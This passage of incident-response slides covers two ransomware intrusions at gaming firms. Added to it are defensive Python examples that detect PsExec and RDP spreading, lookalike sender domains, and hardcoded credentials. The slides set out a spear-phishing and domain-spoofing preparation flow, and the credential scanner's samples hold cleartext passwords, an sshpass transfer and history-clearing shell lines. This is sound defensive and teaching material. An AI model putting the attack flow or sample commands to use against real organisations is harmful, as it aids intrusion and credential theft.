17. How to Complete the Job…
▪ On March 23 the attacker uploaded lsass.dll to DC1-EXCH01 and immediately started harvesting credentials on this system.
[Diagram: MUNICH Data Center; attacker 23.183.81.113; iisstart.aspx and lsass.dll on DC1-EXCH01]
18. Third Phase: 23 March – 5 April
▪ During this period the attacker moved laterally to various systems, including domain controllers and backup servers.
▪ Scanning and reconnaissance of the network were executed regularly; during this scanning the attacker identified the virtual infrastructure where the critical servers were running.
[Diagram: from the MUNICH Data Center (DC1-DC0001 with lsass.dll and atera.exe; DC1-EXCH00 with lsass.dll and iisstart.aspx) the attacker scans the MUNICH Office workstations, dev systems and the virtual infrastructure]
19. Third Phase: Exfiltration
▪ There is evidence that the attacker stole various files during this time.
[Diagram: data leaving the MUNICH Data Center (DC1-DC0001, DC1-EXCH00) and the TORONTO Data Center (DC3-SPORS2) towards 195.149.87.179; MUNICH Office also shown]
20. Status
▪ OK, we have reached this point: it is April 6, the attacker owns the place, and in less than 24 hours he has collected about 12.45 GB of data from the environment, including lots of payment and betting details.
▪ Unfortunately, up to this point the attacker was able to work undetected. Why?
▪ To answer we should clarify the meaning and the role of an "enabler of compromise", but first let's see how the attack unfolded...
21. Ransomware in Play
22. Ransomware in Play… 6 April 2022
▪ The attacker executed a massive dissemination of the ransomware executable with a combination of RDP and PsExec sessions.
[Diagram: RDP + PsExec ransomware distribution from DC1-DC0001 (lsass.dll, atera.exe) to the workstations, dev systems and virtual infrastructure of the MUNICH Office and the MUNICH, TORONTO and MACAU data centers]
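What that dissemination looks like in Windows event data, as an added example (not the deck's tooling). The events are constructed dicts in the shape of an EVTX-to-JSON export; the field names (EventID, Time, Computer, LogonType, IpAddress, TargetUserName, ServiceName, ImagePath, AccountName) are assumptions about the export format. Two detections: PsExec service installs (System event 7045 with the PSEXESVC service name or image, including the case where the service was renamed but the image was not), and fan-out, one source reaching many hosts in a short window, which is what pushing a payload over RDP or PsExec looks like regardless of the tool.

```python
"""Spot RDP + PsExec mass distribution in Windows event data."""
import ntpath
from collections import defaultdict
from datetime import datetime, timedelta


def _rdp(ts, host, ip, user):
    return {"EventID": 4624, "Time": ts, "Computer": host, "LogonType": 10,
            "IpAddress": ip, "TargetUserName": user}


def _svc(ts, host, name, image, account):
    return {"EventID": 7045, "Time": ts, "Computer": host, "ServiceName": name,
            "ImagePath": image, "AccountName": account}


# Constructed sample: one account RDPs into five workstations and installs
# PsExec's service on six servers inside a few minutes; two ordinary events mixed in.
SAMPLE_EVENTS = [
    _rdp("2022-04-06T02:00:10", "WKS01", "10.10.5.20", "corp_admin"),
    _rdp("2022-04-06T02:01:42", "WKS02", "10.10.5.20", "corp_admin"),
    _rdp("2022-04-06T02:03:05", "WKS03", "10.10.5.20", "corp_admin"),
    _rdp("2022-04-06T02:05:30", "WKS04", "10.10.5.20", "corp_admin"),
    _rdp("2022-04-06T02:08:15", "WKS05", "10.10.5.20", "corp_admin"),
    _rdp("2022-04-06T09:15:00", "WKS01", "10.10.7.3", "j.doe"),
    _svc("2022-04-06T02:10:01", "SRV01", "PSEXESVC", r"%SystemRoot%\PSEXESVC.exe", "corp_admin"),
    _svc("2022-04-06T02:10:33", "SRV02", "PSEXESVC", r"%SystemRoot%\PSEXESVC.exe", "corp_admin"),
    _svc("2022-04-06T02:11:12", "SRV03", "PSEXESVC", r"%SystemRoot%\PSEXESVC.exe", "corp_admin"),
    _svc("2022-04-06T02:11:50", "SRV04", "PSEXESVC", r"%SystemRoot%\PSEXESVC.exe", "corp_admin"),
    _svc("2022-04-06T02:12:27", "SRV05", "PSEXESVC", r"%SystemRoot%\PSEXESVC.exe", "corp_admin"),
    _svc("2022-04-06T02:13:04", "SRV06", "renamed_svc", r"%SystemRoot%\PSEXESVC.exe", "corp_admin"),
    _svc("2022-04-06T11:00:00", "SRV01", "VendorUpdater", r"C:\Program Files\Vendor\updater.exe", "SYSTEM"),
]


def _dt(value):
    return datetime.fromisoformat(value)


def psexec_installs(events):
    """7045 events whose service name or image file is PsExec's."""
    out = []
    for e in events:
        if e["EventID"] != 7045:
            continue
        name = e.get("ServiceName", "").upper()
        image = ntpath.basename(e.get("ImagePath", "")).upper()
        if name == "PSEXESVC" or image == "PSEXESVC.EXE":
            out.append(e)
    return out


def fanout(events, key, window_min=10, min_hosts=5):
    """Alert when one value of `key` (source IP, account) reaches min_hosts
    distinct computers within window_min minutes (sliding window per key)."""
    by_key = defaultdict(list)
    for e in events:
        by_key[e[key]].append(e)
    alerts = []
    window = timedelta(minutes=window_min)
    for value, evs in by_key.items():
        evs.sort(key=lambda e: _dt(e["Time"]))
        start = 0
        for end, e in enumerate(evs):
            while _dt(e["Time"]) - _dt(evs[start]["Time"]) > window:
                start += 1
            hosts = {x["Computer"] for x in evs[start:end + 1]}
            if len(hosts) >= min_hosts:
                alerts.append({key: value, "hosts": sorted(hosts),
                               "first": evs[start]["Time"], "last": e["Time"]})
                break
    return alerts


def detect(events):
    rdp = [e for e in events if e["EventID"] == 4624 and e.get("LogonType") == 10]
    psexec = psexec_installs(events)
    return {"psexec_installs": psexec,
            "rdp_fanout": fanout(rdp, "IpAddress"),
            "psexec_fanout": fanout(psexec, "AccountName")}


if __name__ == "__main__":
    for name, result in detect(SAMPLE_EVENTS).items():
        print(name, result)
```

The thresholds (5 hosts in 10 minutes) are a starting point; tune them against what your own admins do during a normal maintenance window, since the same pattern from a known jump host at a known time is how patches get pushed.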
23. Ransomware in Play…
▪ With a separate, tailored action the attacker made sure the company's backup servers were encrypted, using another variant of the ransomware.
▪ This variant was also used against the company's ESXi servers (about 50 hosts), which took down around 2,000 virtual machines hosted on them.
▪ The ransomware file deployed to the ESXi servers was named "32app".
▪ The version affecting all the other hosts was named "bet9je_com_alpha_encrypt_app.exe".
24. Virtual Server Encryption
▪ The attacker appears to have infected the ESXi servers manually, over SSH connections to each host; the backup infrastructure was likewise encrypted by hand.
[Diagram: MUNICH Data Center; from DC1-DC0001 (atera.exe) ransomware distribution via SSH sessions to the virtual infrastructure; ransomware installed manually on the backup infrastructure]
25. What we found: Network Forensics
▪ During the attack the actor left three systems untouched, in particular the Exchange server.
▪ This was probably done to keep an eye on the target: the victim's email system kept working despite the encryption of the remaining systems.
[Diagram: atera.exe still on DC1-EXCH00 in the MUNICH Data Center; DC1-EXCH10; DC3-SPORS2 in the TORONTO Data Center]
26. The Outcome
▪ It took 45 days to get rid of the whole infection, but only five days to recover basic services and let the company slowly get back to business.
▪ From the end users' perspective the attack was a significant blow to the company's reputation and, at least initially, it affected the overall relationship with the customer base.
▪ However, the gaming world has its own rules, and 45 days later it was business as usual at the company headquarters… apart from some minor but meaningful details:
  ▪ Enhanced network visibility
  ▪ New staff for daily monitoring of network and infrastructure
  ▪ No Splashtop, TeamViewer or AnyDesk connections
  ▪ No scripts with hardcoded credentials
  ▪ New cybersecurity procedures
27. The Second Case
28. The second case: introduction
▪ This case targeted a group operating in the online casino sector with about 2,500 employees.
▪ The company has two data centers, in Australia and Hong Kong, and operates mainly in the Asia-Pacific market.
▪ Cybersecurity inside the company was at the time mainly managed by one global MSSP and one local provider.
▪ Again, privacy is a mandatory requirement for an online casino, and the company applied strong controls to online services and data privacy.
▪ However, they left several holes open in their cybersecurity ecosystem:
  ▪ Total lack of network visibility, both internally and in the company's private cloud
  ▪ Lack of organized logs and limited endpoint visibility
  ▪ Lack of any behavior analysis at user level for internal staff
  ▪ Limited investigative and reactive capabilities
  ▪ Real-time threat detection limited to "low-hanging fruit"
  ▪ Lots of enablers of compromise
  ▪ Lack of a proper escalation plan for ICT incidents
29. Attack Preparation
▪ The attack was organized around a flow very similar to the first case, with the difference that this time the attacker targeted the staff with domain spoofing and spear-phishing.
[Flow diagram, attacker on one side, victim and an online file-sharing service on the other:]
  1. Register "company.us" to spoof "company.co.au"
  2. Create an employee@company.us email account
  3. Acquire the target's email address through OSINT and send a phishing email
  4. Send a sounding email discussing business and meetings
  5. Upload the payload to the online file-sharing service and share it with the target
  6. Send a file-sharing notification
30. Initial Compromise
▪ The attacker sent an email mimicking a contractor and asking for feedback on a service architecture.
▪ The email asked to set a time for a call the following week about its content.
[Diagram: attacker at 44.227.65.245 reaching the data center (the slide's diagram is labelled MUNICH Data Center)]
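A check for exactly this kind of sender, company.us posing as company.co.au, as an added example that is not part of the deck. It splits a domain into its registrable label and suffix, then flags a sender whose label matches one of the organisation's domains under a different suffix, or sits one edit away from it. The public-suffix table is a deliberately small assumption (enough for the suffixes used here); production code should use the full Public Suffix List.

```python
"""Flag lookalike sender domains such as company.us posing as company.co.au."""
from email.utils import parseaddr

# Assumption: a tiny stand-in for the Public Suffix List.
TWO_LEVEL_SUFFIXES = {"co.au", "com.au", "co.uk", "org.uk", "co.nz", "co.jp", "com.br"}


def split_domain(domain):
    """Return (registrable label, suffix): company.co.au -> ('company', 'co.au')."""
    parts = domain.lower().strip(".").split(".")
    if len(parts) >= 3 and ".".join(parts[-2:]) in TWO_LEVEL_SUFFIXES:
        return parts[-3], ".".join(parts[-2:])
    if len(parts) >= 2:
        return parts[-2], parts[-1]
    return parts[0], ""


def edit_distance(a, b):
    """Levenshtein distance, used for simple typosquats (c0mpany, compnay)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_reason(sender_domain, org_domains):
    """None for a legitimate or unrelated domain, otherwise why it looks spoofed."""
    sender_domain = sender_domain.lower()
    if sender_domain in {d.lower() for d in org_domains}:
        return None
    s_label, s_suffix = split_domain(sender_domain)
    for org in org_domains:
        o_label, o_suffix = split_domain(org)
        if s_label == o_label and s_suffix != o_suffix:
            return f"same name as {org} under a different suffix ({s_suffix})"
        if edit_distance(s_label, o_label) == 1:
            return f"one edit away from {org}"
    return None


def check_message_from(from_header, org_domains):
    """Parse a From: header and return (sender domain, reason or None)."""
    _, addr = parseaddr(from_header)
    domain = addr.rsplit("@", 1)[-1] if "@" in addr else ""
    return domain, lookalike_reason(domain, org_domains)


if __name__ == "__main__":
    print(check_message_from("Jane Doe <employee@company.us>", {"company.co.au"}))
```

The same function works on the reply-to address and on links in the body, which is where the file-sharing notification in step 6 of the flow would carry its lure.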
31. Exotic Lily + Conti in Action
[Flow diagram, reconstructed from the slide labels:]
▪ Exotic Lily (initial access): domain spoofing, spear-phishing campaign, BazarLoader written to disk and executed, Cobalt Strike, SSL sessions to the Exotic Lily C2.
▪ Initial compromise and recon: download additional tools, perform command-line recon, harvest local and network credentials.
▪ Conti (lateral movement): PowerShell, RDP (Splashtop, AnyDesk) with stolen VPN and admin credentials, RDP toward the domain controllers, Atera package, application servers, leaks.
32. No Doubt on Attribution…
▪ It was absolutely easy to attribute the attack to the Conti ransomware gang: their banner spoke for itself.
[Figure: Conti banner]
33. Enablers of Compromise
34. Enablers of Compromise
▪ An enabler of compromise is a pre-existing condition, present before the attack, that an attacker can exploit to widen the radius and the magnitude of the attack, or to get there faster.
▪ Typical enablers of compromise are legacy protocols such as SMBv1, Telnet and TFTP: if exploited, they grant significant advantages to the attacker.
▪ Other traditional enablers are shared local administrative accounts, guessable credentials, unpatched public web servers and unauthenticated network shares.
▪ Nowadays, during targeted attacks, the attacker can use a myriad of tools and techniques to breach an organization's network, steal sensitive information and compromise its operations.
▪ Vulnerable endpoints, legacy protocols and careless users represent three enablers of successful cyber attacks.
35. Script with Hardcoded Credentials
▪ We found a cron script, /root/inventory_queries.sh, on a critical repository with login credentials hardcoded in it, as illustrated here:
[Figure: excerpt of the script showing the credentials]
▪ We also found cron jobs running as root that carried a service account, password included, in cleartext.
36. Enablers of compromise or careless users???
▪ Unreported TeamViewer and AnyDesk usage. During the analysis we found several systems connected to the company network with TeamViewer and AnyDesk remote-control software installed. Remote-control software on systems connected to the network may provide additional access points that bypass the existing security measures.
▪ Cracked software. During the analysis we found evidence of systems using cracked Windows licenses.
▪ PowerShell scripts with cleartext credentials. Reviewing the network, we found several PowerShell scripts containing cleartext credentials.
▪ Root password in root's .bash_history. Reviewing the logs of the Unix systems we stumbled upon another significant enabler of compromise, which you can see here:
[Figure: excerpt of root's .bash_history]
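A scanner for the three findings on this slide and the previous one (a cron shell script, PowerShell scripts and root's .bash_history carrying cleartext credentials), as an added example and not the deck's tooling. The three sample files are constructed to mirror those findings; only the path /root/inventory_queries.sh comes from the deck, their contents do not. Matched values are redacted in the report so the scanner's output does not become another cleartext copy of the secrets.

```python
"""Scan scripts, cron jobs and shell history for hardcoded credentials."""
import re

RULES = [
    # KEY=value style assignments in shell, ini or PowerShell: PASSWORD=..., secret: "..."
    ("assignment", re.compile(
        r"""(?:pass(?:word|wd)?|pwd|secret|token)\s*[:=]\s*["']?(?!\$)([^\s"']{4,})""", re.I)),
    # explicit password switches of common tools (variables such as $DB_PASS are skipped)
    ("cli_password_flag", re.compile(
        r"""(?:--password[= ]|\bsshpass\s+-p\s+|-Password\s+)["']?(?!\$)([^\s"']{4,})""", re.I)),
    # PowerShell plaintext-to-SecureString conversion
    ("powershell_plaintext", re.compile(
        r"""ConvertTo-SecureString\s+(['"])(.+?)\1[^\n]*-AsPlainText""", re.I)),
    # shell history: echo <password> | passwd ...
    ("history_passwd_pipe", re.compile(
        r"""echo\s+["']?([^\s"'|]+)["']?\s*\|\s*(?:sudo\s+)?passwd\b""")),
]

# Constructed samples (contents invented to mirror the slides' findings).
SAMPLE_FILES = {
    "/root/inventory_queries.sh": """#!/bin/bash
# nightly inventory export (constructed sample)
DB_USER=inventory
DB_PASS="Sup3rS3cret!"
mysql -h db01 -u "$DB_USER" --password="$DB_PASS" inventory < /opt/queries.sql
""",
    "backup.ps1": """# constructed sample
$pw = ConvertTo-SecureString "P@ssw0rd2022" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential("CORP\\svc_backup", $pw)
Invoke-Command -ComputerName bkp01 -Credential $cred -ScriptBlock { Get-Service }
""",
    "/root/.bash_history": """cd /opt/backup
sshpass -p 'Backup#1' ssh backup@10.0.0.5 'tar czf - /srv' > srv.tgz
echo "r00t-P4ss" | passwd --stdin root
history -c
""",
}


def redact(secret):
    return secret[:2] + "*" * max(len(secret) - 2, 3)


def scan_text(name, text):
    """Findings for one file; the same value on the same line is reported once."""
    findings, seen = [], set()
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, rx in RULES:
            for m in rx.finditer(line):
                secret = m.group(m.lastindex)
                if (lineno, secret) in seen:
                    continue
                seen.add((lineno, secret))
                findings.append({"file": name, "line": lineno, "rule": rule, "value": redact(secret)})
    return findings


def scan_files(files):
    """files: mapping of path -> contents."""
    out = []
    for name, text in files.items():
        out.extend(scan_text(name, text))
    return out


if __name__ == "__main__":
    for finding in scan_files(SAMPLE_FILES):
        print(finding)
```

Note that the mysql line in the first sample is not reported: it reads the password from a variable, and the rule skips values starting with "$" so that the finding lands on the assignment rather than on every use of it.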
37. Lessons Learned
38. It's all about visibility… and a clean environment…
▪ The sophisticated nature of today's threat landscape and actors continues to wreak havoc on enterprise infrastructures and, to our surprise, this happens to betting and online casino services more often than expected.
▪ Visibility is the key to protecting a network: actively looking for any security gap, vulnerability, ongoing cyber attack, and any anomaly or misuse of network resources.
▪ The rule is "If you don't find them, you can't fix them".
▪ Unfortunately, visibility is a major issue in the gaming industry.
▪ There could be several reasons for this: the gaming industry may not understand the importance of network visibility, for example, or may lack the tools and resources to get started.
▪ In any case, the inadequate response from security teams is due either to dependency on perimeter-based security solutions that are not agile enough to deal with sophisticated threats, or to the limited spectrum of cybersecurity controls these companies enforce today.
39. Visibility, Flexibility and Practice
[Diagram: Comprehensive Visibility; Preparedness (Incident Response Retainer, Major Incident Practice Drills, Cyber Insurance, Recovery Planning); Proactive Detection and Response; Reactive Capabilities]
40. THANKS!